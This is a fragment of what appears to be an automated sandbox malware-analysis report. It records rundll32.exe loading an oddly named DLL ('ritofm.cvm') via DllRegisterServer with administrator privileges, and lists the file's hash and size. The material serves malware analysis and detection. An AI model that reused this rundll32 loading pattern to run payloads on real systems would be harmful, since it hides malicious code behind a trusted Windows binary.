                                                                                                                                                                                      Start date:12/05/2021
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:rundll32 ..\ritofm.cvm,DllRegisterServer
                                                                                                                                                                                      Imagebase:0xc00000
                                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:15:47:23
                                                                                                                                                                                      Start date:12/05/2021
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                                                                                                                                                                                      Imagebase:0xc00000
                                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                      Disassembly

                                                                                                                                                                                      Code Analysis

                                                                                                                                                                                      Reset < >